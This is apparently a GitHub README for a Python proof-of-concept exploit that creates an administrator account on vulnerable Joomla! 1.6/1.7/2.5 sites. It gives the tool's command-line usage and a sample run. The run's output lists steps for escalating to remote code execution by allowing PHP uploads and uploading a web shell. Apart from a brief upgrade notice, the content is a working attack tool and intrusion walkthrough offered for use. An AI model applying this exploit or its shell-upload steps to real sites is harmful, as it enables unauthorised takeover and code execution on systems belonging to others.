/Joomla-1.6-1.7-2.5-Privilege-Escalation-Vulnerability

A Python script to create an administrator account on Joomla! 1.6/1.7/2.5 using a privilege escalation vulnerability

Primary LanguagePython

Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability

A Python script to create an administrator account on Joomla! 1.6/1.7/2.5 using a privilege escalation vulnerability
GitHub release (latest by date) YouTube Channel Subscribers

Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.

Features

  • Admin user creation on vulnerable Joomla versions
  • Supports HTTP/HTTPS, self-signed certificates and weak TLS cipher suites
  • Step by step explanation on how to RCE with this admin account

Usage

$ ./joomla-admin-account-creation.py -h
PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

usage: joomla-admin-account-creation.py [-h] -t TARGET [-u USERNAME] [-e EMAIL] [-p PASSWORD] [-k] [-v]

PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL to Joomla account creation page.
  -u USERNAME, --username USERNAME
                        Username of the account to create.
  -e EMAIL, --email EMAIL
                        Email of the account to create.
  -p PASSWORD, --password PASSWORD
                        Password of the account to create.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -v, --verbose         Verbose mode. (default: False)

Example

PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

[>] Generating random values
   [>] Username not supplied, using random username : g2V63EdOTt
   [>] Email not supplied, using random email       : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com
   [>] Password not supplied, using random password : 64akMNEBMO

[>] Starting exploit
   [>] Purposely failing account creation for user 'g2V63EdOTt' ...
      [+] Password mismatch (this is expected)!
   [+] Really creating account for user 'g2V63EdOTt' ...
      [+] Account successfully created !

[+] You can connect to your new account:
  | username : g2V63EdOTt
  | password : 64akMNEBMO
  | email    : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com

[+] To achieve Remote Code Execution (RCE):
  | 1. Login with the 'g2V63EdOTt' account on the admin panel: http://localhost:10080/administrator/index.php
  | 2. Go to the media page: http://localhost:10080/administrator/index.php?option=com_media
  |    2.1. Click on parameters on the top right of the page.
  |    2.2. Add .PHP in the list of allowed extensions.
  |    2.3. Upload your shell on the media page.
  | 3. Access your shell and enjoy.

[+] Exploit finished.

References